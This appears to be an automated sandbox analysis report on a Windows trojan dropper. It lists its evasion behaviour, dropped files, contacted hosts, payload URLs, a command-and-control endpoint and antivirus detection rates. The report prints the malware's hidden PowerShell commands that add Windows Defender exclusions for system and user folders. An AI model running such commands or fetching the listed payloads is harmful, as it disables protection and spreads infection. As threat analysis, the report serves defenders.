Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Reka\rapnewsa.exe Evasive API call chain: CreateMutex, DecisionNodes, ExitProcess graph_20-2494
Source: C:\Reka\rapnewsa.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_20-2583
Source: C:\Reka\rapnewsa.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Memory allocated: 3F80000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Memory allocated: 5CC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Memory allocated: 7CC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Memory allocated: B860000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Memory allocated: F860000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Memory allocated: FC30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Memory allocated: 13C30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Code function: 0_2_07D25B20 sldt word ptr [eax] 0_2_07D25B20
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 599859
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 599734
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 599625
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 599516
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 599391
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 599281
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 599169
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 599062
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 598953
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 598844
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 598734
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Thread delayed: delay time: 598625
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Window / User API: threadDelayed 3781
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Window / User API: threadDelayed 6123
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6521
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3211
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7983
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1642
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7025
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2633
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6307
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3417
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6614
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6864
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2771
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7545
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1962
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 5524 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -599859s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -599734s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -599625s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -599516s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -599391s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -599281s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -599169s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -599062s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -598953s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -598844s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -598734s >= -30000s
Source: C:\Users\user\Desktop\UBONg7lmVR.exe TID: 4040 Thread sleep time: -598625s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2460 Thread sleep count: 7025 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1632 Thread sleep count: 2633 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3500 Thread sleep count: 6307 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776 Thread sleep count: 3417 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964 Thread sleep count: 6614 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964 Thread sleep count: 2896 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3356 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472 Thread sleep count: 7545 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472 Thread sleep count: 1962 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Reka\rapnewsa.exe Code function: 20_2_00238D40 FindFirstFileW,FindNextFileW,FindClose, 20_2_00238D40
Source: C:\Reka\rapnewsa.exe Code function: 20_2_00238CA0 GetSystemInfo, 20_2_00238CA0
Source: UBONg7lmVR.exe, 00000000.00000002.4505274504.0000000003FD1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: rapnewsa.exe, 00000014.00000002.2541747512.00000000016D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rapnewsa.exe, 00000014.00000002.2541747512.00000000016D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWK
Source: rapnewsa.exe, 00000014.00000002.2541747512.000000000168E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: tfi0ts5v.qpg.exe, 00000003.00000002.2562920096.000001F2F2194000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Reka\rapnewsa.exe API call chain: ExitProcess graph end node graph_20-2510
Source: C:\Reka\rapnewsa.exe API call chain: ExitProcess graph end node graph_20-2504
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Reka\rapnewsa.exe Code function: 20_2_002317E0 GlobalHandle,LoadLibraryA,GetProcAddress, 20_2_002317E0
Source: C:\Reka\rapnewsa.exe Code function: 20_2_00231A20 mov eax, dword ptr fs:[00000030h] 20_2_00231A20
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\UBONg7lmVR.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Process created: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe "C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Process created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exe
Source: C:\Reka\rapnewsa.exe Code function: 20_2_00238A80 cpuid 20_2_00238A80
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Queries volume information: C:\Users\user\Desktop\UBONg7lmVR.exe VolumeInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 21 Native API | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | 11 Input Capture | 1 Query Registry | Remote Services | 11 Input Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Disable or Modify Tools | LSASS Memory | 21 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 141 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 141 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 24 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph (ID: 1499702, Sample: UBONg7lmVR.exe, Startdate: 27/08/2024, Architecture: WINDOWS, Score: 75)

  • Sample: s3-w.us-east-1.amazonaws.com, s3-1-w.amazonaws.com, 5 other IPs or domains. Signatures: Multi AV Scanner detection for submitted file; AI detected suspicious sample; Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet.
  • UBONg7lmVR.exe (started): contacts bitbucket.org (185.166.143.48, 443, 49704, AMAZON-02US, Germany) and s3-w.us-east-1.amazonaws.com (52.216.214.209, 443, 49707, AMAZON-02US, United States); drops C:\Users\user\AppData\...\tfi0ts5v.qpg.exe (PE32+); starts tfi0ts5v.qpg.exe.
  • tfi0ts5v.qpg.exe (started): contacts github.com (140.82.121.3, 443, 49721, GITHUBUS, United States), raw.githubusercontent.com (185.199.111.133, 443, 49711, 49712, FASTLYUS, Netherlands) and httpbin.org (34.194.69.213, 443, 49724, AMAZON-AESUS, United States); drops C:\Reka\rapnewsa.exe (PE32). Signatures: Multi AV Scanner detection for dropped file; Suspicious powershell command line found; Adds a directory exclusion to Windows Defender. Starts rapnewsa.exe, two powershell.exe processes and 5 other processes.
  • rapnewsa.exe (started): contacts 45.125.66.18 (443, 49723, TELE-ASTeleAsiaLimitedHK, Hong Kong). Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); 3 other signatures.
  • powershell.exe (started): Loading BitLocker PowerShell Module; starts conhost.exe.
  • powershell.exe (started): starts conhost.exe.
  • 5 other processes: start three conhost.exe processes and 2 other processes.

Source | Detection | Scanner | Label | Link
UBONg7lmVR.exe | 3% | ReversingLabs | Win32.Trojan.Generic |
UBONg7lmVR.exe | 14% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Reka\rapnewsa.exe | 100% | Avira | HEUR/AGEN.1315917 |
C:\Reka\rapnewsa.exe | 100% | Joe Sandbox ML | |
C:\Reka\rapnewsa.exe | 16% | ReversingLabs | |
C:\Reka\rapnewsa.exe | 24% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe | 11% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe | 8% | Virustotal | | Browse

No Antivirus matches

Source | Detection | Scanner | Label | Link
s3-w.us-east-1.amazonaws.com | 0% | Virustotal | | Browse
bitbucket.org | 1% | Virustotal | | Browse
github.com | 0% | Virustotal | | Browse
raw.githubusercontent.com | 0% | Virustotal | | Browse
httpbin.org | 1% | Virustotal | | Browse
bbuseruploads.s3.amazonaws.com | 3% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
https://httpbin.org/get | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://bitbucket.org | 0% | Avira URL Cloud | safe |
https://bbuseruploads.s3.amazonaws.com | 0% | Avira URL Cloud | safe |
https://web-security-reports.services.atlassian.com/csp-report/bb-website | 0% | Avira URL Cloud | safe |
https://github.com | 0% | Avira URL Cloud | safe |
https://github.comgithubusercontent.com | 0% | Avira URL Cloud | safe |
https://45.125.66.18/api/receiver/recv | 0% | Avira URL Cloud | safe |
http://bitbucket.orgd | 0% | Avira URL Cloud | safe |
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | 0% | Avira URL Cloud | safe |
https://web-security-reports.services.atlassian.com/csp-report/bb-website | 0% | Virustotal | | Browse
https://github.com | 0% | Virustotal | | Browse
https://45.125.66.18:443/api/receiver/recv | 0% | Avira URL Cloud | safe |
https://github.comgithubusercontent.com | 0% | Virustotal | | Browse
https://dz8aopenkvv6s.cloudfront.net | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe | 0% | Avira URL Cloud | safe |
http://s3-w.us-east-1.amazonaws.comd | 0% | Avira URL Cloud | safe |
http://bitbucket.org | 1% | Virustotal | | Browse
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe | 1% | Virustotal | | Browse
https://raw.githubusercontent.com/workhasf/kelm/main/yjsefceawd.json | 0% | Avira URL Cloud | safe |
https://45.125.66.18/api/receiver/recv | 3% | Virustotal | | Browse
https://45.125.66.18:443/api/receiver/recv | 3% | Virustotal | | Browse
https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.com66666666666666666666 | 0% | Avira URL Cloud | safe |
http://bbuseruploads.s3.amazonaws.comd | 0% | Avira URL Cloud | safe |
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | 0% | Avira URL Cloud | safe |
https://cdn.cookielaw.org/ | 0% | Avira URL Cloud | safe |
https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a- | 0% | Avira URL Cloud | safe |
https://bbuseruploads.s3.amazonaws.com | 3% | Virustotal | | Browse
https://aui-cdn.atlassian.com/ | 0% | Avira URL Cloud | safe |
https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.com66666666666666666666 | 0% | Virustotal | | Browse
https://raw.githubusercontent.com/workhasf/kelm/main/nepipirusas.json | 0% | Avira URL Cloud | safe |
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; | 0% | Avira URL Cloud | safe |
https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a- | 4% | Virustotal | | Browse
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | 0% | Virustotal | | Browse
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net | 0% | Avira URL Cloud | safe |
https://aui-cdn.atlassian.com/ | 0% | Virustotal | | Browse
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | 0% | Virustotal | | Browse
https://dz8aopenkvv6s.cloudfront.net | 0% | Virustotal | | Browse
https://45.125.66.18/li | 0% | Avira URL Cloud | safe |
http://s3-w.us-east-1.amazonaws.com | 0% | Avira URL Cloud | safe |
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net | 0% | Virustotal | | Browse
https://bitbucket.org | 0% | Avira URL Cloud | safe |
https://cdn.cookielaw.org/ | 0% | Virustotal | | Browse
https://github.com/workhasf/kelm/raw/main/iconozave.exeC: | 0% | Avira URL Cloud | safe |
